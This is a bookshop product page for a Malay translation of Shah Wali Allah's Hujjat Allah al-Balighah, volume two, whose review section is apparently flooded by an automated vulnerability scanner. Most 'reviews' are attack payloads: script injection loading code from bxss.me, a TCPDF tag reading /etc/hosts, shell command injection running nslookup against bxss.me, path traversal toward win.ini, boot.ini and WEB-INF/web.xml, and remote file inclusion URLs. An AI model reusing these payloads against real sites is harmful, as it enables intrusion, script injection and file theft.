You currently have
in your basket.

Hujjat Allāh Al-Bālighah: Terjemahan dan Anotasi (Juzuk II)

Zainuddin Hj. Idris & Nik Hassan Nik Abdullah
Availability: In stock
$28.00

ISBN 978-967-527-289-9

Page : 669

Year : 2015

 

Sinopsis

Buku ini merupakan jilid kedua dari kitab Hujjat Allah al-Balighah, karya Al-Imam al-Shah Wali Allah al-Dihlawi (1114-1176H). Jilid kedua ini terbahagi kepada sepuluh bahagian yang merangkumi lima puluh sembilan bab. Buku ini membincangkan secara terperinci dan penuh hikmah serta jelas rahsia hadith-hadith Rasulullah SAW dalam pelbagai bidang yang berkaitan dengan rukun-rukun Islam secara khusus berhubung dengan iman, ilmu, kebersihan dan kesucian, solat, zakat, puasa, haji dan ihsan. Kemudian diiukuti dengan bab-bab mengenai muamalah, pentadbiran keluarga, politik negara, adab mencari rezeki dan juga pelbagai pekara lain. Prinsip-prinsip yang dibentangkan dalam terjemahan ini boleh dijadikan panduan untuk mentafsirkan al-Qur'an dan memahami hadith Rasulullah SAW. Selain itu, buku ini juga boleh membantu seorang yang mempunyai kebolehan berijtihad dan berjiwa bebas untuk membebaskan dirinya daripada belenggu taklid dan layak menjadi pakar dalam syariat Muhammadiah khususnya, dan syariat lain secara umum.

ISBN 978-967-527-289-9

Page : 669

Year : 2015

 

Sinopsis

Buku ini merupakan jilid kedua dari kitab Hujjat Allah al-Balighah, karya Al-Imam al-Shah Wali Allah al-Dihlawi (1114-1176H). Jilid kedua ini terbahagi kepada sepuluh bahagian yang merangkumi lima puluh sembilan bab. Buku ini membincangkan secara terperinci dan penuh hikmah serta jelas rahsia hadith-hadith Rasulullah SAW dalam pelbagai bidang yang berkaitan dengan rukun-rukun Islam secara khusus berhubung dengan iman, ilmu, kebersihan dan kesucian, solat, zakat, puasa, haji dan ihsan. Kemudian diiukuti dengan bab-bab mengenai muamalah, pentadbiran keluarga, politik negara, adab mencari rezeki dan juga pelbagai pekara lain. Prinsip-prinsip yang dibentangkan dalam terjemahan ini boleh dijadikan panduan untuk mentafsirkan al-Qur'an dan memahami hadith Rasulullah SAW. Selain itu, buku ini juga boleh membantu seorang yang mempunyai kebolehan berijtihad dan berjiwa bebas untuk membebaskan dirinya daripada belenggu taklid dan layak menjadi pakar dalam syariat Muhammadiah khususnya, dan syariat lain secara umum.

Write your own review
  • Only registered users can write reviews
  • Bad
  • Excellent
Existing reviews
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1
From: yebglfyh | Date: 4/15/2016 8:07 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-16075&h=18-67a8f-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-16076&h=18-67a8f-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-16076,18,67a8f,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-16077&h=18-67a8f-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-16078&h=18-67a8f-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-16078,18,67a8f,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=007220&r=18-16079&h=18-67a8f-2&/).slice(2),document.documentElement.appendChild(s))//'>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
1'>"><script src=http://bxss.me/s?u=007220&r=18-16080&h=18-67a8f-1></script><tcpdf method="addTTFFont" params="%5B%22%5C%2Fetc%5C%2Fhosts%22%2C%22TrueType%22%2C%22%22%2C255%2C%22ftp%3A%5C%2F%5C%2Fftpadmin%3AzaNEgbe8XcCb%40bxss.me%3A999%5C%2Fbxss,007220,18-16080,18,67a8f,%22%5D"/>
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-16089.18.67a8f.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-16090.18.67a8f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16090.18.67a8f.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-16091.18.67a8f.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-16092.18.67a8f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16092.18.67a8f.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:21 PM
Was this review helpful? Yes No (0/0)
Mr.
set|set&set
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
$(nslookup dns.ce.\007220.18-16093.18.67a8f.\1.bxss.me)
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
&nslookup dns.ce.\007220.18-16094.18.67a8f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16094.18.67a8f.\1.bxss.me&`'
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-16095.18.67a8f.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-16096.18.67a8f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16096.18.67a8f.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-16097.18.67a8f.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-16098.18.67a8f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16098.18.67a8f.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
set|set&set
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
$(nslookup dns.ce.\007220.18-16099.18.67a8f.\1.bxss.me)
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
&nslookup dns.ce.\007220.18-16100.18.67a8f.\1.bxss.me&'\"`0&nslookup dns.ce.\007220.18-16100.18.67a8f.\1.bxss.me&`'
1
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../boot.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../../../../../../../../../../windows/win.ini.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
������������������������������������������������windows��win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
................windowswin.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
..\..\..\..\..\..\..\..\windows\win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
Http://testasp.vulnweb.com/t/fit.txt
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
12345'"\'\");|]*{
<>�''💩
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
http://testasp.vulnweb.com/t/fit.txt?.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF/web.xml
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
testasp.vulnweb.com
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
WEB-INF\web.xml
From: yebglfyh | Date: 4/15/2016 10:22 PM
Was this review helpful? Yes No (0/0)
Mr.
1some_inexistent_file_with_long_name.jpg
From: yebglfyh | Date: 4/15/2016 10:22 PM
